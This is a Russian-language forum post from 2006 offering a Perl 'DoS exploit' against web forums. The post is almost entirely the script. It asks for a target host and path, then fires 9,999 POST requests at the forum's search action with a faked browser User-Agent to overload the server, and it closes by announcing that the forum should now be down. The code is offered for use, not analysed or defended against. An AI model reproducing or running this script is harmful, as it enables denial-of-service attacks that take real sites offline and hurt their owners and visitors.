
11.07.2006, 13:06
|
|
Новичок
Регистрация: 21.06.2006
Сообщений: 17
Провел на форуме: 45009
Репутация:
1
|
|
Вот тебе Dos exploit выполненый на перле.
Код:
#!/usr/bin/perl
use IO::Socket;
print q{
################################################## ##########
# CMD#
################################################## ##########
};
$rand=rand(10);
print "Forum Host: ";
$serv = <stdin>;
chop ($serv);
print "Forum Path: ";
$path = <stdin>;
chop ($path);
for ($i=0; $i<9999; $i++)
{
$postit = "search=Albanian+Hackers+Group+Proof+of+Concept+$x+ &search_terms=any&search_author=&search_forum=-1&search_time=0&search_fields=msgonly&search_cat=-1&sort_by=0&sort_dir=ASC&show_results=posts&return_chars=200";
$lrg = length $postit;
my $sock = new IO::Socket::INET (
PeerAddr => "$serv",
PeerPort => "80",
Proto => "tcp",
);
die "\nThe Socket Can't Connect To The Desired Host or the Host is MayBe DoSed: $!\n" unless $sock;
print $sock "POST $path"."index.php?action=search2 HTTP/1.1\n";
print $sock "Host: $serv\n";
print $sock "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\n";
print $sock "Referer: $serv\n";
print $sock "Accept-Language: en-us\n";
print $sock "Content-Type: application/x-www-form-urlencoded\n";
print $sock "Accept-Encoding: gzip, deflate\n";
print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n";
print $sock "Connection: Keep-Alive\n";
print $sock "Cache-Control: no-cache\n";
print $sock "Content-Length: $lrg\n\n";
print $sock "$postit\n";
close($sock);
## Print a "+" for every loop
syswrite STDOUT, "+";
}
print "Forum shuld be Dosed. Check it out...\n";
|
|
|